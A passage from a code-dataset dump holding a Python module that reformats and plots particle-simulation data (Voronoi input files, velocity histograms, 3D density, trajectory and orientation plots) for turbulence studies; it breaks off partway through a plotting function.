longArray","repo_name":"razvanmarinescu/dkt","sub_path":"ParHierModel.py","file_name":"ParHierModel.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"20783562486","text":"import netCDF4\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom glob import glob\nimport os\nimport vg\nfrom scipy import stats\nfrom mayavi import mlab\nfrom math import ceil, floor\n# mlab.options.backend = 'envisage'\n\nimport sys\n# sys.path.append('/home/alexander/Documents/surface_mixing/Analysis/')\n# from ana_objects import ParticleData\n\nall = ['reformat_for_animate', 'reformat_for_voronoi', 'histogram_cell_velocities', 'plot_densities', 'plot_voro_concs', 'plot_polar_angles', 'plot_polar_angles_superimposed',\n 'plot_trajectories', 'plot_particlewise_angles', 'plot_particlewise_velocities', 'plot_particlewise_vorticities']\n\n# Load matplotlib style file\n# plt.style.use('/home/alexander/Documents/turbulence-patchiness-sims/simulations/analysis/analysis_tools/plotstyle.mplstyle')\n\n\ndef reformat_for_animate(filepath):\n \"\"\"\n A method to take the native parcels netcdf4 output file and 
reformat the particle position data to a matplotlib\n    3D scatterplot-friendly format.\n\n    :param filepath: path to the netCDF file containing particle trajectories WITHOUT THE .NC\n    \"\"\"\n    particlefile = netCDF4.Dataset(str(filepath + \".nc\"))\n\n    num_frames = particlefile.variables[\"lon\"].shape[1]\n\n    masked = np.ma.is_masked(particlefile.variables[\"lon\"][:])\n\n    if masked:\n        lons = particlefile.variables[\"lon\"][:].data[:, 0]\n        lats = particlefile.variables[\"lat\"][:].data[:, 0]\n        deps = particlefile.variables[\"z\"][:].data[:, 0]\n        for f in tqdm(range(num_frames-1)):\n            lons = np.vstack((lons, particlefile.variables[\"lon\"][:].data[:, f + 1]))\n            lats = np.vstack((lats, particlefile.variables[\"lat\"][:].data[:, f + 1]))\n            deps = np.vstack((deps, particlefile.variables[\"z\"][:].data[:, f + 1]))\n    else:\n        lons = particlefile.variables[\"lon\"][:][:, 0]\n        lats = particlefile.variables[\"lat\"][:][:, 0]\n        deps = particlefile.variables[\"z\"][:][:, 0]\n        for f in tqdm(range(num_frames-1)):\n            lons = np.vstack((lons, particlefile.variables[\"lon\"][:][:, f + 1]))\n            lats = np.vstack((lats, particlefile.variables[\"lat\"][:][:, f + 1]))\n            deps = np.vstack((deps, particlefile.variables[\"z\"][:][:, f + 1]))\n\n    filedir = os.path.dirname(filepath)\n    np.save(os.path.join(filedir, \"lons.npy\"), lons) #np.save(filepath + '_lons.npy', lons)\n    np.save(os.path.join(filedir, \"lats.npy\"), lats) #np.save(filepath + '_lats.npy', lats)\n    np.save(os.path.join(filedir, \"deps.npy\"), deps) #np.save(filepath + '_deps.npy', deps)\n\n    particlefile.close()\n\n\ndef reformat_for_voronoi(filedir, timesteps):\n    \"\"\"\n    A method to take the lon, lat, dep .npy files containing particle position data from a simulation and reformat\n    them into the text file(s) of the format required by the Voronoi tessellation library voro++ at each given\n    timestep.\n\n    voro++ requires a .txt file as an input. Each row in this file takes the form:\n\n    <Numerical ID label> <x coordinate> <y coordinate> <z coordinate>\n\n    representing a particle's position at the given time. 
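For example, an input row such as\n\n    0   12.50000    3.40000    7.80000\n\n    (values here purely illustrative) describes particle 0 at position (12.5, 3.4, 7.8).\n\n    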
The output is a .vol text file of the exact same format but\n    with an additional column containing the Voronoi cell volume for each particle:\n\n    <Numerical ID label> <x coordinate> <y coordinate> <z coordinate> <Voronoi cell volume>\n\n    :param filedir: path to the directory containing particle lon.npy, lat.npy, dep.npy files.\n\n    :param timesteps: List of timesteps for which to produce voro++ input files.\n    \"\"\"\n    if not isinstance(timesteps, list):\n        raise TypeError(\"timesteps must be provided as a list.\")\n\n    dx = 600/720\n    print(\"dx = %f ENSURE THIS IS CORRECT FOR YOUR SIM AND YOUR CHOICE OF VOLUME UNITS\" % dx)\n\n    lons = np.load(os.path.join(filedir, \"lons.npy\"))\n    lats = np.load(os.path.join(filedir, \"lats.npy\"))\n    deps = np.load(os.path.join(filedir, \"deps.npy\"))\n\n    n = lons.shape[1]\n\n    for t in tqdm(timesteps):\n        savepath = os.path.join(filedir, \"vor/in/vor_mm_%03d.txt\" % t)\n        points = np.stack((np.arange(n), lons[t, :] * dx, lats[t, :] * dx, deps[t, :] * dx), axis=1)\n        np.savetxt(savepath, points, fmt=[\"%d\", \"%10.5f\", \"%10.5f\", \"%10.5f\"])\n\n\ndef histogram_cell_velocities(filepaths, n_bins, saveplot=None):\n    \"\"\"\n    A method to check the velocities in each cell of the fluid simulation and return a histogram of them, to help\n    determine the Courant number.\n\n    :param filepaths: String or list of strings representing the path(s) to the file(s).\n\n    :param n_bins: Int representing number of bins to pass to np.histogram()\n\n    :param saveplot: Optional path at which to save the histogram/CDF figure; if None, only the H-array and bin\n    edges are computed.\n\n    :return: H : array containing the values of the histogram.\n\n    :return: bin_edges : array of dtype float containing the bin edges.\n    \"\"\"\n\n    count = 0\n\n    paths = sorted(glob(str(filepaths))) if not isinstance(filepaths, list) else filepaths\n    if len(paths) == 0:\n        notfound_paths = filepaths\n        raise IOError(\"FieldSet files not found: %s\" % str(notfound_paths))\n    with tqdm(total=len(paths)) as pbar:\n        for fp in paths:\n            if not os.path.exists(fp):\n                raise IOError(\"FieldSet file not found: %s\" % str(fp))\n\n            nc = netCDF4.Dataset(fp)\n\n            vels = np.power(np.power(nc.variables[\"u\"][:], 2) + np.power(nc.variables[\"v\"][:], 2) + np.power(nc.variables[\"w\"][:], 2), 0.5)\n            if count == 0:\n                vmax = np.max(vels)\n\n            nc.close()\n\n            if count == 0:\n                H, bin_edges = np.histogram(vels, bins=n_bins, range=(0, vmax))\n            else:\n                H += np.histogram(vels, bins=bin_edges)[0]\n\n            count += 1\n            pbar.update(1)\n\n    if saveplot is not None:\n        width = (bin_edges[1] - bin_edges[0])\n\n        fig = plt.figure()\n\n        # plot pdf\n        plt_pdf = fig.add_subplot(1, 2, 1)\n        plt_pdf.bar(bin_edges[1:], H, width=width)\n        xlim = plt_pdf.get_xlim()\n\n        # plot cdf\n        plt_cdf = fig.add_subplot(1, 2, 2)\n        plt_cdf.set_xlim(xlim)\n        plt_cdf.set_ylim(0., 1.)\n        n = sum(H)\n        x = bin_edges\n        y = np.append(np.zeros(1), np.cumsum(H) / n)\n        plt_cdf.plot(x, y)\n\n        # compute cutoffs and plot as vertical red lines on both plots\n        cutoff_50 = np.argmax(y >= 0.5)\n        cutoff_95 = np.argmax(y >= 0.95)\n        cutoff_99 = np.argmax(y >= 0.99)\n        plt_pdf.axvline(x[cutoff_50], ymin=0., ymax=plt_pdf.get_ylim()[1], color='limegreen')\n        plt_pdf.axvline(x[cutoff_95], ymin=0., ymax=plt_pdf.get_ylim()[1], color='r')\n        plt_pdf.axvline(x[cutoff_99], ymin=0., ymax=plt_pdf.get_ylim()[1], color='r')\n        pdf_text_ypos = 0.9 * plt_pdf.get_ylim()[1]\n        plt_pdf.text(x[cutoff_50], pdf_text_ypos, \"x=%0.2f\" % x[cutoff_50], fontsize=18, 
color='limegreen')\n plt_pdf.text(x[cutoff_95], pdf_text_ypos, \"x=%0.2f\" % x[cutoff_95], fontsize=18, color='r')\n plt_pdf.text(x[cutoff_99], pdf_text_ypos, \"x=%0.2f\" % x[cutoff_99], fontsize=18, color='r')\n plt_cdf.axvline(x[cutoff_50], ymin=0., ymax=plt_cdf.get_ylim()[1], color='limegreen')\n plt_cdf.axvline(x[cutoff_95], ymin=0., ymax=1., color='r')\n plt_cdf.axvline(x[cutoff_99], ymin=0., ymax=1., color='r')\n cdf_text_ypos = 0.9 * plt_cdf.get_ylim()[1]\n plt_cdf.text(x[cutoff_50], cdf_text_ypos, \"x=%0.2f\" % x[cutoff_50], fontsize=18, color='limegreen')\n plt_cdf.text(x[cutoff_95], cdf_text_ypos, \"x=%0.2f\" % x[cutoff_95], fontsize=18, color='r')\n plt_cdf.text(x[cutoff_99], cdf_text_ypos, \"x=%0.2f\" % x[cutoff_99], fontsize=18, color='r')\n\n # set labels, titles, etc...\n plt_pdf.set_title(\"Histogram\", fontsize=20)\n plt_pdf.set_xlabel(\"Velocity Magnitudes (m/s)\", fontsize=18)\n plt_pdf.set_ylabel(\"Count\", fontsize=18)\n\n plt_cdf.set_title(\"CDF\", fontsize=20)\n plt_cdf.set_xlabel(\"Velocity Magnitudes (m/s)\", fontsize=18)\n plt_cdf.set_ylabel(\"Fraction of Data\", fontsize=18)\n\n plt.savefig(saveplot)\n\n return H, bin_edges\n\n\ndef plot_densities(filepath, savepath=None):\n \"\"\"\n This method uses the mayavi library to produce 3D density plots of a particle simulation.\n :param filepath: string representing the path to netCDF file containing particle position data (EXCLUDING THE .nc)\n :param savepath: string representing where to save the density plots.\n \"\"\"\n timestamps = np.linspace(0, 300, 31, dtype=int).tolist()\n lons = np.load(os.path.join(filepath, \"lons.npy\"))\n lats = np.load(os.path.join(filepath, \"lats.npy\"))\n deps = np.load(os.path.join(filepath, \"deps.npy\"))\n density = np.load(os.path.join(filepath, \"density.npy\"))\n density = density[:, :, 0:180, :]\n min = density.min()\n max = density.max()\n xmin, ymin, zmin = (0., 0., 0.)\n xmax, ymax, zmax = (720., 720., 360.)\n xi, yi, zi = density.shape[0:3]\n xi, yi, zi = np.mgrid[xmin:xmax:xi*1j, ymin:ymax:yi*1j, zmin:zmax:zi*1j]\n\n # for t in tqdm(range(density.shape[3])):\n # figure = mlab.figure('DensityPlot', bgcolor=(1., 1., 1.), fgcolor=(0.,0.,0.), size=(720, 720))\n # grid = mlab.pipeline.scalar_field(xi, yi, zi, density[:, :, :, t])\n # #mlab.pipeline.volume(grid, vmin=min + .2 * (max - min), vmax=min + .8 * (max - min))\n # # vol_lowconc = mlab.pipeline.volume(grid, vmin=0., vmax=min + .25 * (max - min), color=(1., 0., 0.))\n # vol_highconc = mlab.pipeline.volume(grid, vmin=min + .75 * (max - min), vmax=max, color=(0., 0., 1.))\n # mlab.axes()\n # mlab.view(azimuth=45, elevation=235, distance=2500, focalpoint=(xmax/2., ymax/2., zmax/2.))\n # # mlab.view(azimuth=-45, elevation=315, distance=2500, focalpoint=(xmax/2., ymax/2., zmax/2.))\n # # mlab.show()\n # if savepath is not None:\n # mlab.savefig(savepath + \"%03.0f\" % t + \"dead.png\")\n # mlab.clf()\n\n for t in tqdm(range(density.shape[3])):\n x = lons[timestamps[t], ~np.isnan(lons[timestamps[t], :])]\n y = lats[timestamps[t], ~np.isnan(lats[timestamps[t], :])]\n z = deps[timestamps[t], ~np.isnan(deps[timestamps[t], :])]\n\n xyz = np.vstack([x, y, z])\n kde = stats.gaussian_kde(xyz)\n density = kde(xyz)\n min=density.min()\n max=density.max()\n f = 0.5\n f_cutoff = min + 0.5*(max-min)\n colors = np.zeros((len(x), 4)).astype(np.uint8)\n for i in range(x.size):\n colors[i, 0] = 255 * (density[i] < f_cutoff)\n colors[i, 2] = 255 * (density[i] > f_cutoff)\n colors[i, 3] = int(255 * 0.2) * (density[i] > f_cutoff) + int(255 * 
0.99) * (density[i] < f_cutoff)\n\n # Plot scatter with mayavi\n figure = mlab.figure('DensityPlot', bgcolor=(1., 1., 1.), fgcolor=(0., 0., 0.), size=(720, 720))\n pts = mlab.points3d(x, y, z, density, colormap='blue-red', scale_mode='none', scale_factor=2)\n pts.module_manager.scalar_lut_manager.lut.table = colors\n mlab.axes()\n mlab.draw()\n mlab.savefig(savepath + \"%03.0f\" % t + \".png\")\n mlab.clf()\n\n\ndef plot_voro_concs(filepath, savepath=None):\n \"\"\"\n This method uses the mayavi library to produce 3D density plots of a particle simulation based on the reciprocal of\n of the volume of the voronoi cells.\n :param filepath: string representing the path to netCDF file containing particle position data (EXCLUDING THE .nc)\n :param savepath: string representing where to save the density plots.\n \"\"\"\n timestamps = np.linspace(0, 300, 31, dtype=int).tolist()\n lons = np.load(os.path.join(filepath, \"lons.npy\"))[timestamps, :]\n lats = np.load(os.path.join(filepath, \"lats.npy\"))[timestamps, :]\n deps = np.load(os.path.join(filepath, \"deps.npy\"))[timestamps, :]\n vols = np.load(os.path.join(filepath, \"vols.npy\"))\n concs = np.reciprocal(vols)\n\n for t in [26]:#tqdm(range(31)):\n not_nans = ~np.isnan(lons[t, :])\n x = lons[t, not_nans]\n y = lats[t, not_nans]\n z = deps[t, not_nans]\n c = concs[not_nans, t]\n x = x[z>1]\n y = y[z>1]\n c = c[z>1]\n z = z[z>1]\n\n # Plot scatter with mayavi\n figure = mlab.figure('DensityPlot', bgcolor=(1., 1., 1.), fgcolor=(0., 0., 0.), size=(720, 720))\n pts = mlab.points3d(x, y, z, np.log10(c), colormap='blue-red', scale_mode='scalar', scale_factor=1., transparent=True)\n # pts.module_manager.scalar_lut_manager.lut.table = colors\n # pts.mlab_source.dataset.point_data.scalars = c\n\n # s = np.ones_like(x)\n # pts = mlab.quiver3d(x, y, z, s, s, s, scalars=c, mode=\"sphere\", scale_factor=.5)\n # pts.glyph.color_mode = 'color_by_scalar'\n # pts.glyph.glyph_source.glyph_source.center = [0, 0, 0]\n\n mlab.axes()\n mlab.draw()\n mlab.savefig(savepath + \"%03.0f\" % t + \".png\")\n # mlab.clf()\n\n\n\n# def plot_entropies(filepath):\n# tload = [0, -1]\n# # time_origin=datetime.datetime(2000,1,5)\n# # Times = [(time_origin + datetime.timedelta(days=t * 5)).strftime(\"%Y-%m\") for t in tload]\n#\n# # def reduce_particleset():\n# # # Load particle data\n# # pdir = datadir + 'MixingEntropy/' # Data directory\n# # fname = 'surfaceparticles_y2000_m1_d5_simdays3650_pos' # F\n# #\n# # # load data\n# # pdata = ParticleData.from_nc(pdir=pdir, fname=fname, Ngrids=40, tload=tload)\n# # pdata.remove_nans()\n# #\n# # # Get those particles that start and end in the chosen basin\n# # r = np.load(outdir_paper + \"EntropyMatrix/Entropy_Clusters.npy\")\n# #\n# # for i_basin in range(1, 6): # loop over basins as defined in figure 3a)\n# #\n# # print('--------------')\n# # print('BASIN: ', i_basin)\n# # print('--------------')\n# #\n# # # define basin region\n# # basin = np.array([1 if r[i] == i_basin else 0 for i in range(len(r))])\n# #\n# # # constrain to particles that start in the respective basin\n# # l = {0: basin}\n# # basin_data = pdata.get_subset(l, 2.)\n# #\n# # # select particles that are in the basin each subsequent year\n# # for t in range(len(tload)):\n# # l[t] = basin\n# # basin_data = pdata.get_subset(l, 2.)\n# #\n# # lons = basin_data.lons.filled(np.nan)\n# # lats = basin_data.lats.filled(np.nan)\n# # times = basin_data.times.filled(np.nan)\n# # np.savez(outdir_paper + 'EntropyMatrix/Reduced_particles_' + str(i_basin), lons=lons, lats=lats,\n# # 
times=times)\n#\n# pdata = ParticleData.from_nc(filepath, \"\", tload)\n#\n#\n# def compute_transfer_matrix():\n# # deg_labels is the choice of square binning\n#\n# for i_basin in range(1, 6):\n#\n# # load reduced particle data for each basin\n# pdata = np.load(outdir_paper + 'EntropyMatrix/Reduced_particles_' + str(i_basin) + '.npz', 'r')\n# lons = pdata['lons']\n# lats = pdata['lats']\n# times = pdata['times']\n# del pdata\n# pdata_ocean = ParticleData(lons=lons, lats=lats, times=times)\n#\n# # Define labels according to initial position\n# transfer_matrix = {}\n# pdata_ocean.set_labels(deg_labels, 0)\n# l0 = pdata_ocean.label\n# N = len(np.unique(l0))\n#\n# # get existing labels and translate them into labels 0, ...., N-1\n# unique, counts = np.unique(l0, return_counts=True)\n# py_labels = dict(list(zip(unique, list(range(N)))))\n# original_labels = dict(list(zip(list(range(N)), unique)))\n#\n# # compute transfer matrix\n# for t in range(0, len(lons[0])):\n# n = np.zeros((N, N))\n# pdata_ocean.set_labels(deg_labels, t)\n# l = pdata_ocean.label\n#\n# for j in range(len(l)):\n# if l[j] in l0: # restrict to the existing labels (at t=0)\n# n[py_labels[l0[j]], py_labels[l[j]]] += 1\n#\n# transfer_matrix[t] = n\n#\n# np.savez(outdir_paper + 'EntropyMatrix/n_matrix_deg' + str(int(deg_labels)) + '/n_matrix_' + str(i_basin),\n# n=transfer_matrix, original_labels=original_labels)\n#\n# def plot_spatial_entropy():\n# # function to get the spatial entropy\n#\n# Lons_edges = np.linspace(-180, 180, int(360 / deg_labels) + 1)\n# Lats_edges = np.linspace(-90, 90, int(180 / deg_labels) + 1)\n# Lons_centered = np.array([(Lons_edges[i] + Lons_edges[i + 1]) / deg_labels for i in range(len(Lons_edges) - 1)])\n# Lats_centered = np.array([(Lats_edges[i] + Lats_edges[i + 1]) / deg_labels for i in range(len(Lats_edges) - 1)])\n#\n# fig = plt.figure(figsize=(12, 8))\n# gs1 = gridspec.GridSpec(2, 2)\n# gs1.update(wspace=0.15, hspace=0.)\n#\n# labels = ['a) ', 'b) ', 'c) ', 'd) ']\n#\n# for t, k in zip([1, 3, 6, 10], list(range(4))):\n# T = Times[t]\n#\n# S_loc = np.zeros(len(Lons_centered) * len(Lats_centered)) # final entropy field\n#\n# for i_basin in range(1, 6):\n# # load data\n# data = np.load(outdir_paper + 'EntropyMatrix/n_matrix_deg' + str(int(deg_labels)) + '/n_matrix_' + str(\n# i_basin) + '.npz', 'r')\n# n_matrix = data['n'].tolist()\n# original_labels = data['original_labels'].tolist()\n# n = n_matrix[t]\n#\n# # row-normalize n\n# for i in range(len(n)):\n# s = np.sum(n[i, :])\n# if s != 0:\n# n[i, :] /= s\n# else:\n# n[i, :] = 0\n#\n# # column-normalize\n# for i in range(len(n)):\n# s = np.sum(n[:, i])\n# if s != 0:\n# n[:, i] /= s\n# else:\n# n[:, i] = 0\n#\n# # Compute entropy for each location\n# S = {}\n# for j in range(len(n)):\n# s = 0\n# for i in range(len(n)):\n# if n[i, j] != 0:\n# s -= n[i, j] * np.log(n[i, j])\n#\n# S[original_labels[j]] = s\n#\n# # maximum entropy\n# N = len(np.unique(list(original_labels.keys())))\n# maxS = np.log(N)\n#\n# for i in range(len(S_loc)):\n# if i in list(S.keys()):\n# S_loc[i] = S[i] / maxS\n#\n# plt.subplot(gs1[k])\n#\n# S_loc = S_loc.reshape((len(Lats_centered), len(Lons_centered)))\n# S_loc = np.roll(S_loc, int(180 / deg_labels))\n# m = Basemap(projection='robin', lon_0=0, resolution='c')\n# m.drawparallels([-60, -30, 0, 30, 60], labels=[True, False, False, True], color='w', linewidth=1.2, size=9)\n# m.drawmeridians([-150, -60, 0, 60, 150], labels=[False, False, False, True], color='w', linewidth=1.2,\n# size=9)\n# m.drawcoastlines()\n# 
m.fillcontinents(color='lightgrey')\n#\n# lon_bins_2d, lat_bins_2d = np.meshgrid(Lons_edges, Lats_edges)\n# xs, ys = m(lon_bins_2d, lat_bins_2d)\n# assert (np.max(S_loc) <= 1)\n# p = plt.pcolormesh(xs, ys, S_loc, cmap='magma', vmin=0, vmax=1, rasterized=True)\n# plt.title(labels[k] + str(T), size=12, y=1.01)\n#\n# # color bar on the right\n# fig.subplots_adjust(right=0.8)\n# cbar_ax = fig.add_axes([0.822, 0.35, 0.015, 0.4])\n# cbar = fig.colorbar(p, cax=cbar_ax)\n# cbar.ax.tick_params(labelsize=11)\n# cbar.set_label(r'$S/S_{max}$', size=12)\n# fig.savefig(outdir_paper + figure_title, dpi=300, bbox_inches='tight')\n#\n# reduce_particleset()\n# compute_transfer_matrix()\n# plot_spatial_entropy()\n\n\ndef plot_polar_angles(filepath, savepath_hist=None, savepath_timeseries=None):\n timestamps = np.arange(0, 300, 10)\n nc = netCDF4.Dataset(filepath + \".nc\")\n dir_x = nc.variables[\"dir_x\"][:][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][:, timestamps]\n\n up = np.array([0., 0., -1])\n\n theta = np.zeros_like(dir_x)\n mean = np.zeros(timestamps.size)\n\n for t in tqdm(range(timestamps.size)):\n fig = plt.figure(figsize=(12, 9))\n for p in range(dir_x.shape[0]):\n orientation = np.array((dir_x[p, t], dir_y[p, t], dir_z[p, t]))\n theta[p, t] = vg.angle(up, orientation)\n\n n = theta[:, t].size\n # x = np.sort(theta[:, t].flatten())\n # y = np.array(range(n)) / float(n)\n #mean[t] = x[np.argmax(y >= .5)]\n mean[t] = np.mean(theta[:, t])\n # ylims = [400, 1000]\n # text_x = [0.1, 0.2]\n # text_y = [200, 500]\n plt_hist = fig.add_subplot(111)#(1, 2, i + 1)\n plt_hist.hist(theta[:, t], 100, range=(0., 180.))\n plt_hist.set_title(\"Histogram of Particle Polar Angle at time t=%2.f s\" % t, fontsize=25)\n plt_hist.set_xlim(0, 180)\n plt_hist.set_ylim(0., 5000)\n plt_hist.set_xlabel(\"Mean Polar angle (deg)\", fontsize=25)\n plt_hist.set_ylabel(\"Count\", fontsize=25)\n plt_hist.axvline(mean[t], ymin=0., ymax=plt_hist.get_ylim()[1], color='red')\n plt_hist.text(137, 120, \"mean =%2.1f\" % mean[t], fontsize=25, color='red')\n for tick in plt_hist.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_hist.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n\n fig.savefig(savepath_hist + str(int(t)))\n plt.close('plt_hist')\n # np.save(filepath + '_theta.npy', theta)\n\n fig = plt.figure(figsize=(12, 9))\n plt_means = fig.add_subplot(111)\n plt_means.set_title(\"Mean Particle Polar Angle over time\", fontsize=25)\n plt_means.set_xlabel(\"Time (s)\", fontsize=25)\n plt_means.set_ylabel(\"Polar angle (deg)\", fontsize=25)\n plt_means.set_xlim(0, 30)\n plt_means.set_ylim(100, 0)\n plt_means.plot(np.arange(0, 30), mean, '-bo', linewidth=2, markersize=3)\n for tick in plt_means.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_means.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n fig.savefig(savepath_timeseries)\n plt.close('plt_means')\n\n\ndef plot_trajectories(sample, orientations, filepath, savepath=None):\n from mpl_toolkits.mplot3d import Axes3D\n import mpl_toolkits.mplot3d.art3d as art3d\n step = 1\n\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n x = nc.variables[\"lon\"][:][sample][:, timestamps]\n y = nc.variables[\"lat\"][:][sample][:, timestamps]\n z = nc.variables[\"z\"][:][sample][:, timestamps]\n if orientations:\n dir_x = nc.variables[\"dir_x\"][:][sample][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][sample][:, 
timestamps]\n dir_z = nc.variables[\"dir_z\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(15, 15))\n\n ax = plt.axes(projection='3d')\n ax.set_title(\"Particle Trajectories\", fontsize=20)\n ax.set_xlabel(\"Longitude\", fontsize=20)\n ax.set_ylabel(\"Latitude\", fontsize=20)\n ax.set_zlabel(\"Depth\", fontsize=20)\n\n m = 1\n for p in tqdm(range(len(sample))):\n ax.scatter(x[p, 0], y[p, 0], -z[p, 0], 'c', c='k', s=6.0) # mark start points\n ax.plot(x[p, :], y[p, :], -z[p, :], 'o', markersize=4)\n if orientations:\n ax.quiver(x[p, ::m], y[p, ::m], -z[p, ::m],\n dir_x[p, ::m], dir_y[p, ::m], -dir_z[p, ::m],\n length=7, color='k')\n\n # ax.set_xlim3d(0, 720)\n # ax.set_ylim3d(0, 720)\n # ax.set_zlim3d(-180, 0)\n # plt.subplots_adjust(top=0.9)\n\n fig.savefig(savepath)\n\n\ndef plot_polar_angles_superimposed(filepaths, colours, labels, savepath_timeseries=None):\n\n def extract_polar_angles(filepath):\n timestamps = np.arange(0, 300, 10)\n nc = netCDF4.Dataset(filepath + \".nc\")\n dir_x = nc.variables[\"dir_x\"][:][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][:, timestamps]\n\n up = np.array([0., 0., -1])\n\n theta = np.zeros_like(dir_x)\n mean = np.zeros(timestamps.size)\n\n for t in range(timestamps.size):\n for p in range(dir_x.shape[0]):\n orientation = np.array((dir_x[p, t], dir_y[p, t], dir_z[p, t]))\n theta[p, t] = vg.angle(up, orientation)\n\n mean[t] = np.mean(theta[:, t])\n\n return mean\n\n timeseries = []\n with tqdm(total=len(filepaths)) as pbar:\n for file in filepaths:\n timeseries.append(extract_polar_angles(file))\n pbar.update(1)\n\n\n fig = plt.figure(figsize=(12, 9))\n plt_means = plt.subplot(111)\n plt_means.set_title(\"Mean Particle Polar Angles over time\", fontsize=25)\n plt_means.set_xlabel(\"Time (s)\", fontsize=25)\n plt_means.set_ylabel(\"Polar angle (deg)\", fontsize=25)\n plt_means.set_xlim(0, 30)\n plt_means.set_ylim(100, 0)\n plt_means.plot(np.arange(0, 30), timeseries[0], '-o', color=colours[:, 0], linewidth=2, markersize=3, label=labels[0])\n plt_means.plot(np.arange(0, 30), timeseries[1], '-o', color=colours[:, 1], linewidth=2, markersize=3, label=labels[1])\n plt_means.plot(np.arange(0, 30), timeseries[2], '-o', color=colours[:, 2], linewidth=2, markersize=3, label=labels[2])\n plt_means.plot(np.arange(0, 30), timeseries[3], '-o', color=colours[:, 3], linewidth=2, markersize=3, label=labels[3])\n plt_means.plot(np.arange(0, 30), timeseries[4], '-o', color=colours[:, 4], linewidth=2, markersize=3, label=labels[4])\n plt_means.legend()\n for tick in plt_means.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_means.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n fig.savefig(savepath_timeseries)\n plt.close('plt_means')\n\n\ndef plot_trajectories(sample, orientations, filepath, savepath=None):\n from mpl_toolkits.mplot3d import Axes3D\n import mpl_toolkits.mplot3d.art3d as art3d\n step = 1\n\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n x = nc.variables[\"lon\"][:][sample][:, timestamps]\n y = nc.variables[\"lat\"][:][sample][:, timestamps]\n z = nc.variables[\"z\"][:][sample][:, timestamps]\n if orientations:\n dir_x = nc.variables[\"dir_x\"][:][sample][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][sample][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(15, 15))\n\n ax = plt.axes(projection='3d')\n 
ax.set_title(\"Particle Trajectories\", fontsize=20)\n ax.set_xlabel(\"Longitude\", fontsize=20)\n ax.set_ylabel(\"Latitude\", fontsize=20)\n ax.set_zlabel(\"Depth\", fontsize=20)\n\n m = 1\n for p in tqdm(range(len(sample))):\n ax.scatter(x[p, 0], y[p, 0], -z[p, 0], 'c', c='k', s=6.0) # mark start points\n ax.plot(x[p, :], y[p, :], -z[p, :], 'o', markersize=4)\n if orientations:\n ax.quiver(x[p, ::m], y[p, ::m], -z[p, ::m],\n dir_x[p, ::m], dir_y[p, ::m], -dir_z[p, ::m],\n length=7, color='k')\n\n # ax.set_xlim3d(0, 720)\n # ax.set_ylim3d(0, 720)\n # ax.set_zlim3d(-180, 0)\n # plt.subplots_adjust(top=0.9)\n\n fig.savefig(savepath)\n\n\ndef animate_directions(p, filepath, savepath=None):\n from mpl_toolkits.mplot3d import Axes3D\n import mpl_toolkits.mplot3d.art3d as art3d\n from matplotlib.animation import FuncAnimation\n\n step = 1\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n nc = netCDF4.Dataset(filepath + \".nc\")\n dir_x = nc.variables[\"dir_x\"][:][p, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][p, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][p, timestamps]\n nc.close()\n\n fig, ax = plt.subplots(figsize=(12, 12))\n fig.set_tight_layout(True)\n\n # Query the figure's on-screen size and DPI. Note that when saving the figure to\n # a file, we need to provide a DPI for that separately.\n print('fig size: {0} DPI, size in inches {1}'.format(\n fig.get_dpi(), fig.get_size_inches()))\n\n # Create a sphere\n r = .5\n pi = np.pi\n cos = np.cos\n sin = np.sin\n phi, theta = np.mgrid[0.0:pi:100j, 0.0:2.0 * pi:100j]\n x = r * sin(phi) * cos(theta)\n y = r * sin(phi) * sin(theta)\n z = r * cos(phi)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_title(\"Particle %d Orientation\" %p, fontsize=25)\n ax.set_xlabel(\"\", fontsize=25)\n ax.set_ylabel(\"\", fontsize=25)\n ax.set_zlabel(\"\", fontsize=25)\n ax.plot_surface(x, y, z, rstride=1, cstride=1, color='c', alpha=0.2, linewidth=0)\n ax.set_xlim([-1, 1])\n ax.set_ylim([-1, 1])\n ax.set_zlim([-1, 1])\n ax.set_aspect(\"equal\")\n ax.axis(\"off\")\n for t in timestamps:\n arrow = ax.quiver(r*dir_x[t], r*dir_y[t], -r*dir_z[t], dir_x[t], dir_y[t], -dir_z[t], length=1, color='k')\n fig.savefig(savepath + \"%03d.png\" % t)\n arrow.remove()\n\n\ndef plot_particlewise_angles(sample, filepath, savepath=None):\n\n def cart2spher(v_x, v_y, v_z):\n import math\n r = np.sqrt(np.power(v_x, 2) + np.power(v_y, 2) + np.power(v_z, 2))\n phi = math.pi - np.arctan2(np.sqrt(np.power(v_x, 2) + np.power(v_y, 2)), v_z) # pi - ans because z is positive downwards\n theta = np.arctan2(v_y, v_x)\n return r, phi, theta\n\n step = 1\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n dir_x = nc.variables[\"dir_x\"][:][sample][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][sample][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(12, 14))\n plt_p_rs = fig.add_subplot(311)\n plt_p_rs.set_title(\"Sample of Particle Orientation 